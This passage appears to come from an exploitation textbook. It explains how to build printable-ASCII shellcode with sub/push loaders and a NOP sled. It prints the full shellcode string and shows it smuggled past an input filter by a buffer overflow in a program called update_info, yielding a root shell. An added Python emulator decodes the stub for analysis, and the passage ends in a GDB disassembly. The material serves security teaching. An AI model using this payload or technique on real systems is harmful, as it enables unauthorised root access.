At the end, the shellcode has been built somewhere after the loader
code, most likely leaving a gap between the newly built shellcode and the
executing loader code. This gap can be bridged by building a NOP sled
between the loader code and the shellcode.
Once again, sub instructions are used to set EAX to 0x90909090, and
EAX is repeatedly pushed to the stack. With each push instruction, four NOP
instructions are tacked onto the beginning of the shellcode. Eventually, these
NOP instructions will build right over the executing push instructions of the
loader code, allowing the EIP and program execution to flow over the sled
into the shellcode.
This assembles into a printable ASCII string, which doubles as executable
machine code.
reader@hacking:~/booksrc $ nasm printable.s
reader@hacking:~/booksrc $ echo $(cat ./printable)
TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%-ptt%P-
%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT-%NN0-%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w--
B2H2PPPPPPPPPPPPPPPPPPPPPP
reader@hacking:~/booksrc $
This printable ASCII shellcode can now be used to smuggle the actual
shellcode past the input-validation routine of the update_info program.
reader@hacking:~/booksrc $ ./update_info $(perl -e 'print "AAAA"x10') $(cat ./printable)
[DEBUG]: desc argument is at 0xbffff910
Segmentation fault
reader@hacking:~/booksrc $ ./update_info $(perl -e 'print "\x10\xf9\xff\xbf"x10') $(cat ./printable)
[DEBUG]: desc argument is at 0xbffff910
Updating product ########### with description 'TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-
Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%-ptt%P-%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-
TTTT-%NN0-%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w--B2H2PPPPPPPPPPPPPPPPPPPPPP'
sh-3.2# whoami
root
sh-3.2#
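The loader mechanism described above (relocate ESP, zero EAX with two ANDs, build each dword with sub instructions and push it, then push the NOP dword until the sled reaches the loader) and the fact that it walks straight through a printable-characters-only filter can both be checked by emulating the stub. The script below is an added example, not code from the book or from the update_info program: it models only the six one-byte instructions such a loader is built from, runs the printable string transcribed from the echo output above through that model, and reports the bytes the stub would write, how far from the original ESP they land, and whether the recovered bytes would themselves pass the filter. The starting ESP value, the function names and the result keys are the example's own assumptions; it works for any blob built from those opcodes, not just the one on the page.

```python
"""Emulate a printable-ASCII loader stub to recover the payload it builds.

Added example for analysis of a blob found in an input log; it is not the
book's code. Only these one-byte x86 instructions are modelled:
  push esp (0x54), pop eax (0x58), push eax (0x50), pop esp (0x5c),
  sub eax, imm32 (0x2d), and eax, imm32 (0x25).
"""
import struct

MASK = 0xFFFFFFFF

# Transcribed from the page's `echo $(cat ./printable)` output; the three
# wrapped lines are joined and the backslash is kept via a raw string.
PRINTABLE = (
    r"TX-3399-Purr-!TTTP\%JONE%501:-%mm4-%mm%--DW%P-Yf1Y-fwfY-yzSzP-iii%-Zkx%-%Fw%P-XXn6-99w%-ptt%P-"
    "%w%%-qqqq-jPiXP-cccc-Dw0D-WICzP-c66c-W0TmP-TTTT-%NN0-%o42-7a-0P-xGGx-rrrx-aFOwP-pApA-N-w--"
    "B2H2PPPPPPPPPPPPPPPPPPPPPP"
)


def is_printable(data: bytes) -> bool:
    """The kind of check an input filter applies: every byte a visible ASCII char."""
    return all(0x21 <= b <= 0x7E for b in data)


def emulate_loader(code: bytes, esp0: int = 0xBFFFF000) -> dict:
    """Run the stub against a tiny model of EAX, ESP and the stack.

    esp0 is an assumed starting ESP; only offsets relative to it matter.
    Any opcode outside the modelled set raises instead of being skipped.
    """
    eax, esp = 0, esp0
    mem = {}                  # byte address -> value, only what the stub writes
    build_base = esp0         # ESP right after the stub relocates the stack

    def push(value):
        nonlocal esp
        esp = (esp - 4) & MASK
        for k, b in enumerate(struct.pack("<I", value)):
            mem[(esp + k) & MASK] = b

    def read32(addr):
        return struct.unpack("<I", bytes(mem.get((addr + k) & MASK, 0) for k in range(4)))[0]

    i = 0
    while i < len(code):
        op = code[i]
        if op == 0x54:                      # push esp (pushes the pre-decrement value)
            push(esp); i += 1
        elif op == 0x58:                    # pop eax
            eax = read32(esp); esp = (esp + 4) & MASK; i += 1
        elif op == 0x50:                    # push eax
            push(eax); i += 1
        elif op == 0x5C:                    # pop esp: ESP is loaded from the top of stack
            esp = read32(esp); build_base = esp; i += 1
        elif op in (0x2D, 0x25):            # sub eax, imm32 / and eax, imm32
            if i + 5 > len(code):
                raise ValueError(f"truncated immediate at offset {i}")
            imm = struct.unpack("<I", code[i + 1:i + 5])[0]
            eax = (eax - imm) & MASK if op == 0x2D else eax & imm
            i += 5
        else:
            raise ValueError(f"unsupported opcode 0x{op:02x} at offset {i}")

    # Everything pushed after the relocation lies between the final ESP and build_base.
    payload = bytes(mem[a] for a in range(esp, build_base))
    return {
        "eax": eax,                            # register value when the stub ends
        "build_offset": build_base - esp0,     # relocation distance from the original ESP
        "payload_offset": esp - esp0,          # where the built bytes start, relative to ESP
        "payload": payload,
    }


def recover_payload(blob: str) -> dict:
    """Decode a printable loader blob (as a string) into the bytes it would build."""
    return emulate_loader(blob.encode("ascii"))


if __name__ == "__main__":
    r = recover_payload(PRINTABLE)
    print("input passes a printable-only filter:", is_printable(PRINTABLE.encode()))
    print("stack relocated by %d bytes; payload at ESP+%d, %d bytes"
          % (r["build_offset"], r["payload_offset"], len(r["payload"])))
    print("final EAX: 0x%08x" % r["eax"])
    print("recovered payload:", r["payload"].hex())
    print("recovered payload passes the same filter:", is_printable(r["payload"]))
```

Run on the string from the page, the model shows the stub moving ESP 860 bytes above its starting value, building the shellcode dwords downward from there, and finishing with EAX equal to 0x90909090, the NOP dword the text describes being pushed repeatedly. The recovered bytes fail the printable check the input passed, which is the defender's takeaway: a character-class filter constrains the encoding, not the code, so the real fix is bounds checking on the copy.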
Neat. In case you weren't able to follow everything that just happened
there, the output below watches the execution of the printable shellcode
in GDB. The stack addresses will be slightly different, changing the return
addresses, but this won't affect the printable shellcode—it calculates its location
based on ESP, giving it this versatility.
reader@hacking:~/booksrc $ gdb -q ./update_info
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass update_product_description
Dump of assembler code for function update_product_description:
0x080484a8 <update_product_description+0>: push ebp
0x080484a9 <update_product_description+1>: mov ebp,esp
0x080484ab <update_product_description+3>: sub esp,0x28
0x080484ae <update_product_description+6>: mov eax,DWORD PTR [ebp+8]
0x080484b1 <update_product_description+9>: mov DWORD PTR [esp+4],eax